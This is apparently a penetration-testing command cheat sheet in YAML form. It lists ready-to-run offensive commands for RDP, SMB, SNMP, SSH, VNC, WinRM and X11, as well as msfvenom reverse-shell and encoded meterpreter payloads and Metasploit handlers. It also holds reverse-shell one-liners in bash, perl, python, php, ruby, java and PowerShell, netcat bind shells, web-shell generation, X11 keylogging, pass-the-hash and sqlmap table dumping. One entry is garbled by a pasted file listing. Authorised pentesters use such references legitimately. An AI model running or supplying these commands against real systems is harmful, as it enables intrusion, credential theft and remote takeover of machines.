lang: sh
tags: postgres, 5432, 5433
desc: postgres - connect full options
- cmd: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
lang: sh
tags: rdp, windows, 3389
desc: enable RDP
- cmd: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
lang: sh
tags: rdp, windows, 3389
desc: enable restricted admin
- cmd: Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
lang: sh
tags: rdp, windows, 3389
desc: disable restricted admin
- cmd: sharprdp.exe computername=<computer> command="<command>" username=<domain>\<user> password=<password>
lang: sh
tags: rdp, windows, 3389
desc: rdp from console
- cmd: netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
lang: sh
tags: rdp, windows, 3389
desc: Add firewall authorisation RDP
- cmd: rdesktop -g 90% <ip> -u <user> -p <password> -d <domain>
lang: sh
tags: rdp, windows
desc: rdesktop - classic
- cmd: rdesktop -g 90% <ip> -u <user> -p <password> -d <domain> -r disk:share=<share>
lang: sh
tags: rdp, windows
desc: rdesktop - with share
- cmd: xfreerdp /u:<user> /p:<password> /d:<domain> /v:<ip> /size:1800x924
lang: sh
tags: rdp, windows
desc: xfreerdp - classic
- cmd: xfreerdp /u:<user> /p:<password> /d:<domain> /v:<ip> /size:1800x924 /drive:share,<share>
lang: sh
tags: rdp, windows
desc: xfreerdp - with share
- cmd: xfreerdp /u:<user> /pth:<hash> /d:<domain> /v:<ip>
lang: sh
tags: rdp, windows
desc: xfreerdp - pass the hash
- cmd: enum4linux -a <ip>
lang: sh
tags: smb, samba
desc: enum4linux - all except dictionary based share name listing (default)
- cmd: enum4linux -v <ip>
lang: sh
tags: smb, samba
desc: enum4linux - verbose
- cmd: enum4linux -u "" -p "" <ip>
lang: sh
tags: smb, samba
desc: enum4linux - null access
- cmd: enum4linux -u "guest" -p "" <ip>
lang: sh
tags: smb, samba
desc: enum4linux - guest access
- cmd: enum4linux -u <user> -p <password> <ip>
lang: sh
tags: smb, samba
desc: enum4linux - with authentication
- cmd: enum4linux -U <ip> |grep 'user:'
lang: sh
tags: smb, samba
desc: enum4linux - list Users
- cmd: nbtscan -r <ip_range>
lang: sh
tags: smb, samba
desc: nbtscan - scan network looking for hosts
- cmd: smbclient \\\\<ip>\\<share> -U "<user>%<password>"
lang: sh
tags: smb, samba
desc: smbclient with username and password
- cmd: smbclient \\\\<ip>\\<share> -U "<user>%"
lang: sh
tags: smb, samba
desc: smbclient sessions without password
- cmd: smbclient \\\\<ip>\\<share> -U "%"
lang: sh
tags: smb, samba
desc: smbclient null session
- cmd: nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip>
lang: sh
tags: smb, samba
desc: smb - find not signed smb
- cmd: mount -t cifs //<ip>/C\$ /tmp/mnttarget/ -o username=<user> -o domain=<domain>
lang: sh
tags: smb, samba
desc: smb mount folder
- cmd: smbmap -H <ip> -u "<user>%<password>"
lang: sh
tags: smb, samba
desc: smbmap
- cmd: smbmap -u "" -p "" -P 445 -H <ip>
lang: sh
tags: smb, samba
desc: smbmap - null access
- cmd: smbmap -u "guest" -p "" -P 445 -H <ip>
lang: sh
tags: smb, samba
desc: smbmap - guest access
- cmd: smbmap -H <ip> -u <user> -p <password> -d <domain> -r
lang: sh
tags: smb, samba
desc: smbmap - list root of all shares
- cmd: smbmap -H <ip> -u <user> -p <password> -d <domain> -R <path> --depth 1
lang: sh
tags: smb, samba
desc: smbmap - recursively list dirs, and files
- cmd: nmap -p25 --script smtp-commands <ip>
lang: sh
tags: smtp, 25
desc: smtp nmap enumeration
- cmd: nmap -p25 --script smtp-ntlm-info <ip>
lang: sh
tags: smtp, 25
desc: smtp nmap ntlm information disclosure
- cmd: nmap script smtp-enum-users.nse <ip>
lang: sh
tags: smtp, 25
desc: nmap - smtp user enum
- cmd: smtp-user-enum -M VRFY -U <userlist> -t <ip>
lang: sh
tags: smtp, 25
desc: smtp user enum
- cmd: msfconsole -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <ip>; exploit"
lang: sh
tags: smtp, 25
desc: msf - smtp user enum
- cmd: nmap -sU --open -p 161 -sC -sV <ip>
lang: sh
tags: snmp, 161
desc: nmap, snmp scan
- cmd: nmap -sU --open -p 161 --script=snmp-brute <ip> --script-args snmp-brute.communitiesdb=<snmp_community_strings_file>
lang: sh
tags: snmp, 161
desc: nmap, snmp brute
- cmd: echo public > community; echo private >> community; echo manager >> community; onesixtyone -c community -i ips; rm community
lang: sh
tags: snmp, 161
desc: onesixtyone
- cmd: snmpwalk -c public -v1 <ip>
lang: sh
tags: snmp, 161
desc: snmpwalk entire tree
- cmd: snmpwalk -c private -v1 <ip> 1.3.6.1.2.1.25.4.2.1.2
lang: sh
tags: snmp, 161
desc: snmpwalk - list running processes
- cmd: snmp-check -t <ip> -c public -p 162
lang: sh
tags: snmp, 161
desc: snmp-check - check snmp service on specified port (default:162)
- cmd: eval "$(ssh-agent -s)"; ssh-add
lang: sh
tags: ssh, 22
desc: Start ssh agent
- cmd: ssh -L <local_port>:<remote_host>:<remote_port> <user>@<ip>
lang: sh
tags: ssh, 22
desc: SSH local port forwarding (get remote_port on local)
- cmd: ssh -R <remote_binding>:<remote_port>:<local_host>:<local_port> <user>@<ip>
lang: sh
tags: ssh, 22
desc: SSH remote port forwarding (send local port to remote) (need GatewayPorts yes)
- cmd: ssh -D <socks_port> <user>@<ip>
lang: sh
tags: ssh, 22
desc: SSH proxysocks
- cmd: ssh-keyscan -t rsa <IP> -p <PORT>
lang: sh
tags: ssh, 22
desc: get public ssh key of server
- cmd: msfconsole -x "use scanner/ssh/ssh_enumusers; set RHOSTS <ip>; set USER_FILE <user_file>; set CHECK_FALSE true; exploit"
lang: sh
tags: ssh, 22
desc: msf - bruteforce username
- cmd: ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 <user>@<ip>
lang: sh
tags: ssh, 22
desc: SSH - old algorithm
- cmd: nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <ip>
lang: sh
tags: telnet, 23
desc: nmap - telnet
- cmd: nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <port> <ip>
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vnc - nmap enum
- cmd: vncviewer <ip>::<port>
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vncviewer - connect to vnc no pass
- cmd: vncviewer -password <password.txt> <ip>::<port>
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vncviewer - connect to vnc with password
- cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS <ip>; set RPORT <port>; run"
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vnc msf test none auth
- cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USERNAME <username>; run"
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vnc - msf test login bf
- cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USER_FILE <users_file>; set PASS_FILE <pass_file>; run"
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vnc - msf test login bf (2)
- cmd: msfconsole -x "use post/windows/gather/credentials/vnc; set SESSION <session>; run"
lang: sh
tags: vnc, 5800, 5801, 5900, 5901
desc: vnc - post exploit retrieve credentials
- cmd: Enable-PSRemoting -Force ; Set-Item wsman:\localhost\client\trustedhosts 7z 7z.md Android-Debug-Bridge-adb Android-Debug-Bridge-adb.md apktool apktool.md application-whitelisting application-whitelisting.md Arsenal Arsenal.md AWS AWS.md binwalk binwalk.md Bitadmins.md bloodhound bloodhound.md bof bof.md Brew Brew.md Builds-recreates-starts-and-attaches-to-containers-for-all-services.md Builds-recreates-starts-and-attaches-to-containers-for-a-service.md Builds-recreates-starts-and-detaches-to-containers-for-all-services.md Builds-recreates-starts-and-detaches-to-containers-for-a-service.md C certipy certipy.md certutil certutil.md cewl cewl.md chisel chisel.md C.md cme cme.md coercer coercer.md commands.yaml Compile-windows-PE-32 Compile-windows-PE-32.md connect-to-mysql-docker-container.md Crack-files Crack-files.md Create-a-new-bash-process-inside-the-container-and-connect-it-to-the-terminal.md Create-new-network.md Crontab Crontab.md crunch crunch.md cve-bin-tool cve-bin-tool.md Delete-all-running-and-stopped-containers.md Dirb Dirb.md DNS DNS.md Docker Docker.md dotnet-.net dotnet-.net.md drupwn drupwn.md enum4linux enum4linux.md eyewitness eyewitness.md feroxbuster feroxbuster.md ffuf ffuf.md flashrom flashrom.md FTP FTP.md git git.md gobuster gobuster.md gowitness gowitness.md gpg gpg.md grep grep-hash grep-hash.md grep.md gzip gzip.md hashcat hashcat.md Hydra Hydra.md impacket Impacket impacket.md Impacket.md Jadx Jadx.md Java.md john-the-ripper john-the-ripper.md json json.md JwtTool JwtTool.md kerberos kerberos.md keytool keytool.md kubernetes kubernetes.md LAPS LAPS.md Lazagne Lazagne.md ldap ldap.md linux linux-bash linux-bash.md linux.md List-the-networks.md List-the-running-containers.md Lsassy Lsassy.md mimikatz mimikatz.md mitm6 mitm6.md MSF MSF.md msfvenom msfvenom-create-user msfvenom-create-user.md msfvenom-Handler msfvenom-Handler.md msfvenom.md msfvenom-Shellcode msfvenom-Shellcode.md msssql msssql.md Mysql Mysql.md ncat ncat.md netbios netbios.md netcat netcat.md network network.md nfs nfs.md nikto nikto.md nmap nmap.md nodejs nodejs.md npm npm.md nvm nvm.md Objection Objection.md openssl openssl.md Others-grep Others-grep.md parse.sh php-grep php-grep.md pop pop.md Postgres Postgres.md powershell powershell.md powerview powerview.md Printerbug-and-Petitpotam Printerbug-and-Petitpotam.md Print-the-last-lines-of-a-containers-logs-and-following-its-logs.md Print-the-last-lines-of-a-containers-logs.md Print-the-last-lines-of-a-services-logs-and-following-its-logs.md Print-the-last-lines-of-a-services-logs.md procdump procdump.md QR-code QR-code.md race-condition race-condition.md rar rar.md rdesktop rdesktop.md Redis Redis.md responder responder.md reverse-shell reverse-shell.md rpcclient rpcclient.md rubeus rubeus.md run-mysql-container.md Scripting-Payloads Scripting-Payloads.md SCShell SCShell.md Searchsploit Searchsploit.md sed sed.md server server.md Service Service.md smb smbmap smbmap.md smb.md SMTP SMTP.md snmp snmp.md socat socat.md SQLMAP SQLMAP.md ssh ssh.md Stop-a-running-container-through-SIGKILL.md Stop-a-running-container-through-SIGTERM.md Stops-containers-and-removes-containers-networks-created-by-up.md systemctl systemctl.md tar tar.md telnet telnet.md Tomcat Tomcat.md unblob unblob.md veracrypt veracrypt.md VNC VNC.md WEB WEB.md web-shell web-shell.md wfuzz wfuzz.md wifi wifi.md windows windows.md windows-rdp windows-rdp.md winrm winrm.md WPSCAN WPSCAN.md X11 X11.md xfreerdp xfreerdp.md ysoserial ysoserial.md ysoserial.net ysoserial.net.md yum yum.md zip zip.md
lang: ps1
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Enable winrm (powershell)
- cmd: wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
lang: sh
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Enable winrm (wmic)
- cmd: Test-WSMan -computername <computername>
lang: ps1
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Test target is configure to use winrm (powershell)
- cmd: Invoke-Command -computername <computername> -ScriptBlock {<cmd>} -credential <domain>\<username>
lang: ps1
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Execute a command on the target over winrm (powershell)
- cmd: Invoke-Command -ComputerName <computername> -FilePath <path_to_script> -credential <domain>\<username>
lang: ps1
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Execute a script on the target over winrm (powershell)
- cmd: Enter-PSSession -ComputerName <computername> -Credential <domain>\<username>
lang: ps1
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Get a powershell session with winrm (powershell)
- cmd: .\PsExec.exe \\<computername> -u <domain>\<username> -p <password> -h -d powershell.exe "enable-psremoting -force"
lang: sh
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: Enable winrm remotelly from psexec
- cmd: gem install evil-winrm
lang: sh
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: evil-winrm install
- cmd: evil-winrm -i <ip>/<domain> -u <user> -p <password>
lang: sh
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: evil-winrm use
- cmd: evil-winrm -i <ip>/<domain> -u <user> -H <hash>
lang: sh
tags: windows, remote, winrm, evilwinrm, 5985, 5986
desc: evil-winrm use pass the hash
- cmd: nmap -sV --script x11-access -p <port> <ip>
lang: sh
tags: pentest
desc: '- check anonymous connection'
- cmd: xdpyinfo -display <ip>:<display>
lang: sh
tags: x11, 6000
desc: x11 - verify connection
- cmd: xwininfo -root -tree -display <ip>:<display>
lang: sh
tags: x11, 6000
desc: x11 - verify connection (2)
- cmd: xwd root screen silent display <ip>:<display> > screenshot.xwd; convert screenshot.xwd screenshot.png
lang: sh
tags: x11, 6000
desc: X11 - screenshot
- cmd: xspy <ip>
lang: sh
tags: x11, 6000
desc: X11 - keylogging
- cmd: xrdp <ip>:<display>
lang: sh
tags: x11, 6000
desc: X11 - remote desktop view
- cmd: msfconsole -x "use exploit/unix/x11/x11_keyboard_exec; set RHOSTS <rhost>; set payload cmd/unix/reverse_bash; set lhost <lhost>; set lport <lport>; exploit"
lang: sh
tags: x11, 6000
desc: X11 - msf reverse shell
- cmd: msf-pattern_create -l <size>
lang: sh
tags: bof, buffer overflow
desc: bof, pattern creation
- cmd: msf-pattern_offset -l <size> -q <pattern>
lang: sh
tags: bof, buffer overflow
desc: bof, pattern offset
- cmd: msf-nasm_shell # nasm > jmp esp
lang: sh
tags: bof, buffer overflow
desc: bof, nasm - show opcode from asm
- cmd: ROPgadget --binary <binary>
lang: sh
tags: bof, buffer overflow
desc: ropgadget - Specify a binary filename to analyze
- cmd: ROPgadget --binary <binary> --ropchain
lang: sh
tags: bof, buffer overflow
desc: ropgagdet - Enable the ROP chain generation
- cmd: ROPgadget --binary <binary> --opcode <opcode>
lang: sh
tags: bof, buffer overflow
desc: ropgagdet - Search opcode in executable segment
- cmd: ROPgadget --binary <binary> --string <string> --range <start_address>-<end_address>; ROPgadget --binary <binary> --only="<instructions>"; ROPgadget --binary <binary> --filter="<instructions>"
lang: sh
tags: bof, buffer overflow
desc: ropgadget - Search string between two addresses (0x...-0x...)
- cmd: !mona modules
lang: sh
tags: bof, buffer overflow
desc: mona - Show all loaded modules and their properties
- cmd: !mona config -set workingfolder <path|c:\logs\%p>
lang: sh
tags: bof, buffer overflow
desc: mona - Configure the log directory (no need to create it)
- cmd: !mona config -get workingfolder
lang: sh
tags: bof, buffer overflow
desc: mona - Verify the current the log directory
- cmd: !mona pc <pattern_size|400>
lang: sh
tags: bof, buffer overflow
desc: mona - Create a cyclic pattern of a given size
- cmd: !mona findmsp
lang: sh
tags: bof, buffer overflow
desc: mona - Find cyclic pattern in memory
- cmd: !mona po <pattern_value|41346541>
lang: sh
tags: bof, buffer overflow
desc: mona - Find location (offset) of 4 bytes in a cyclic pattern
- cmd: !mona find -s <pattern_value|"w00tw00t">
lang: sh
tags: bof, buffer overflow
desc: 'mona - Find bytes in memory (ex: eggs)'
- cmd: !mona jmp -r <reg_name|esp> -n
lang: sh
tags: bof, buffer overflow
desc: mona - Find pointers that will allow you to jump to a register (without null bytes)
- cmd: !mona getiat -s <function_name|*strcpy*>
lang: sh
tags: bof, buffer overflow
desc: mona - Find a function in IAT
- cmd: !mona sehchain
lang: sh
tags: bof, buffer overflow
desc: mona - Show the current SEH chain
- cmd: !mona bpseh
lang: sh
tags: bof, buffer overflow
desc: mona - Set a breakpoint on all current SEH Handler function pointers
- cmd: !mona seh
lang: sh
tags: bof, buffer overflow
desc: 'mona - Find pointers to assist with SEH overwrite exploits (default: no aslr, no rebase, no safeseh)'
- cmd: !mona bytearray -cpb <excluded_bytes|'\x00\x0a\x0d'>
lang: sh
tags: bof, buffer overflow
desc: mona - Badchar hunting step 1 - Creates a byte array
- cmd: !mona compare -f <input_file|C:\BadChars\bytearray.bin> -a <bytesarray_address|esp>
lang: sh
tags: bof, buffer overflow
desc: mona - Badchar hunting step 3 - compare until "!!! Hooray, normal shellcode unmodified !!!" message
- cmd: !mona rop -cm aslr=false,rebase=false
lang: sh
tags: bof, buffer overflow
desc: 'mona - Finds gadgets that can be used in a ROP exploit and do ROP magic with them (Note : can take 20 minutes)'
- cmd: !mona stackpivot -cm os=true -distance <min,max|12,12>
lang: sh
tags: bof, buffer overflow
desc: mona - Finds stackpivots (move stackpointer to controlled area)
- cmd: !mona find -type file -s <input_file|C:\stackpivot.txt> -p2p
lang: sh
tags: bof, buffer overflow
desc: mona - Show pointers to pointers to the pattern (might take a while !)
- cmd: msfvenom --list payloads
lang: sh
tags: msfvenom, reverse shell
desc: msfvenom payloads list
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f exe > shell.exe
lang: sh
tags: msfvenom, reverse shell
desc: msfvenom - payload windows x86 meterpeter unstagged
- cmd: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
lang: sh
tags: msfvenom, reverse shell
desc: Linux Meterpreter Reverse Shell
- cmd: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip|tun0> LPORT=<port> prependfork=true -f elf -t 300 -e x64/xor_dynamic -o test.elf
lang: sh
tags: msfvenom, reverse shell
desc: Linux x64 Meterpreter Reverse tcp
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
lang: sh
tags: msfvenom, reverse shell
desc: Windows Meterpreter Reverse TCP Shell
- cmd: msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<local> -f exe > shell.exe
lang: sh
tags: msfvenom, reverse shell
desc: Windows Reverse TCP Shell
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<local> -e shikata_ga_nai -i 3 -f exe > encoded.exe
lang: sh
tags: msfvenom, reverse shell
desc: Windows Encoded Meterpreter Windows Reverse Shell
- cmd: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho
lang: sh
tags: msfvenom, reverse shell
desc: Mac Reverse Shell
- cmd: msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=<port|443> -f exe -o /var/www/html/msfnonstaged.exe
lang: sh
tags: msfvenom, reverse shell
desc: meterpreter x64 - https - non staged
- cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> -f exe -o /var/www/html/msfstaged.exe
lang: sh
tags: msfvenom, reverse shell
desc: meterpreter x64 - https - staged
- cmd: msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.php
lang: sh
tags: msfvenom, reverse shell
desc: Web Payloads
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp
lang: sh
tags: msfvenom, reverse shell
desc: ASP Meterpreter Reverse TCP
- cmd: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp
lang: sh
tags: msfvenom, reverse shell
desc: JSP Java Meterpreter Reverse TCP
- cmd: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war
lang: sh
tags: msfvenom, reverse shell
desc: WAR
- cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f vbapplication
lang: sh
tags: msfvenom, reverse shell
desc: VBA 32bits
- cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f ps1
lang: sh
tags: msfvenom, reverse shell
desc: powershell 32 bits
- cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> -f dll -o <dll|output.dll>
lang: sh
tags: msfvenom, reverse shell
desc: DLL
- cmd: msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=<port> -f raw > shell.py
lang: sh
tags: pentest
desc: Python Reverse Shell
- cmd: msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=<port> -f raw > shell.sh
lang: sh
tags: pentest
desc: Bash Unix Reverse Shell
- cmd: msfvenom -p cmd/unix/reverse_perl LHOST=<ip> LPORT=<port> -f raw > shell.pl
lang: sh
tags: pentest
desc: Perl Unix Reverse shell
- cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f ps1
lang: sh
tags: pentest
desc: Powershell
- cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> --encrypt xor --encrypt-key <key> -f csharp
lang: sh
tags: pentest
desc: Csharp - xor encrypted
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
lang: sh
tags: pentest
desc: Windows Meterpreter Reverse TCP Shellcode
- cmd: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
lang: sh
tags: pentest
desc: Linux Meterpreter Reverse TCP Shellcode
- cmd: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
lang: sh
tags: pentest
desc: Mac Reverse TCP Shellcode
- cmd: msfvenom -p windows/adduser USER=<user|hacker> PASS='<pass|Hacker123$>' -f exe > adduser.exe
lang: sh
tags: pentest
desc: MCreate User
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port>; set payload windows/meterpreter/reverse_tcp; exploit"
lang: sh
tags: pentest
desc: Metasploit Handler windows tcp 32bits staged
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/meterpreter/reverse_https; set EXITFUNC thread; exploit"
lang: sh
tags: pentest
desc: Metasploit Handler windows https 32bits staged
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter/reverse_https; exploit"
lang: sh
tags: pentest
desc: Metasploit Handler windows https 64bits staged
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter_reverse_https; exploit"
lang: sh
tags: pentest
desc: Metasploit - Handler windows https 64bits unstaged
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter/reverse_https; set EXITFUNC thread; set EnableStageEncoding true; set StageEncoder <encoder|x64/xor_dynamic>; exploit"
lang: sh
tags: pentest
desc: Metasploit - Handler windows https 64bits stagged - encoded xor
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip|tun0>; set lport <lport|443>; set payload windows/x64/meterpreter/reverse_https; set EXITFUNC thread; set EnableStageEncoding true; set StageEncoder x64/xor_dynamic; exploit"
lang: sh
tags: pentest
desc: Metasploit - Handler linux tcp 64bits stagged - encoded xor
- cmd: nc -nlvp <lport>
lang: sh
tags: nc, netcat
desc: nc setup listener
- cmd: nc -nlvp <port> -e cmd.exe
lang: sh
tags: nc, netcat
desc: nc bind shell windows
- cmd: nc -nlvp <port> -e /bin/bash
lang: sh
tags: nc, netcat
desc: nc bind shell linux
- cmd: nc -nv <ip> <port> -e cmd.exe
lang: sh
tags: nc, netcat
desc: nc reverse shell windows
- cmd: nc -nv <ip> <port> -e /bin/bash
lang: sh
tags: nc, netcat
desc: nc reverse shell linux
- cmd: nc -nlvp <port> > <incomming_file>
lang: sh
tags: nc, netcat
desc: nc transfer file - receiver
- cmd: nc -nv <ip> <port> < <file_to_send>
lang: sh
tags: nc, netcat
desc: nc transfer file - sender
- cmd: ncat --exec cmd.exe --allow <allowed_ip> -vnl <port> --ssl
lang: sh
tags: ncat
desc: ncat bind shell ssl filtered
- cmd: ncat -v <ip> <port> --ssl
lang: sh
tags: ncat
desc: ncat bind shell ssl connection
- cmd: ncat --listen --proxy-type http <port>
lang: sh
tags: ncat
desc: ncat HTTP WEB proxy
- cmd: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
lang: sh
tags: pentest
desc: bash reverse shell
- cmd: perl -e 'use Socket; $i="<lhost>"; $p=<lport>; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); }; '
lang: sh
tags: pentest
desc: perl reverse shell
- cmd: python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<lhost>",<lport>)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); '
lang: sh
tags: pentest
desc: python reverse shell
- cmd: php -r '$sock=fsockopen("<lhost>",<lport>); exec("/bin/sh -i <&3 >&3 2>&3"); '
lang: sh
tags: pentest
desc: php reverse shell
- cmd: ruby -rsocket -e'f=TCPSocket.open("<lhost>",<lport>).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
lang: sh
tags: pentest
desc: ruby reverse shell
- cmd: 'r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<lhost>/<lport>; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()'
lang: java
tags: pentest
desc: '[[java]] reverse shell'
- cmd: $client = New-Object System.Net.Sockets.TCPClient('<lhost>',<lport>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()
lang: ps1
tags: pentest
desc: '[[Arsenal/Windows/powershell]] reverse shell'
- cmd: rlwrap nc -nlvp <port>
lang: sh
tags: pentest
desc: windows listener autocompletion
- cmd: python -c 'import pty; pty.spawn("/bin/bash")'
lang: sh
tags: pentest
desc: interactive reverse shell - and Ctrl+Z (1)
- cmd: stty raw -echo
lang: sh
tags: pentest
desc: interactive reverse shell - on host - and do fg (2)
- cmd: reset; stty rows <ROWS> cols <COLS>; export TERM=xterm-256color
lang: sh
tags: pentest
desc: interactive reverse shell - on reverse (3)
- cmd: weevely generate <password> <output_file|web_shell.php>
lang: sh
tags: web, shell, webshell, shellweb, weevely
desc: weevely web shell generation with output file
- cmd: weevely <url> <password>
lang: sh
tags: web, shell, webshell, shellweb, weevely
desc: weevely web shell connection
- cmd: sqlmap -u <url> -p <arguments> --dbs
lang: sh
tags: sql injection
desc: basic sqlmap step 1
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type>
lang: sh
tags: sql injection
desc: basic sqlmap step 2
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> --tables
lang: sh
tags: sql injection
desc: basic sqlmap step 3
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> -T <tables> --columns
lang: sh
tags: sql injection
desc: basic sqlmap step 4
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> -T <tables> -C <columns> --dump
lang: sh
tags: sql injection
desc: basic sqlmap step 5
- cmd: sqlmap -u <url> --dbs
lang: sh
tags: sql injection
desc: sqlmap - list dbs
- cmd: sqlmap -u <url> -D <db> --tables
lang: sh
tags: sql injection
desc: sqlmap - list tables
- cmd: sqlmap -u <url> -D <db> -T <table> --dump
lang: sh
tags: sql injection
desc: sqlmap - dump a table
- cmd: sqlmap -u <url> -D <db> -T <table> --columns
lang: sh
tags: sql injection
desc: sqlmap - list columns of a table
- cmd: sqlmap -u <url> -D <db> -T <table> -C <c1>,<c2> --dump; sqlmap -u <url> --os-shell; sqlmap -u <url> --file-read=<remote_file>; sqlmap -u <url> --file-write=<local_file> --file-dest=<remote_path_destination>
lang: sh
tags: sql injection
desc: sqlmap - dump only some tables columns
- cmd: sqlmap -u <url>
lang: sh
tags: sql injection
desc: sqlmap - classic get
- cmd: sqlmap -u <url> -d "<params>"; sqlmap -u <url> --cookie=<cookie>
lang: sh
tags: sql injection
desc: sqlmap - classic post
- cmd: sqlmap -r <request_file>; sqlmap -u '<url>' tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
lang: sh
tags: sql injection
desc: sqlmap - use file
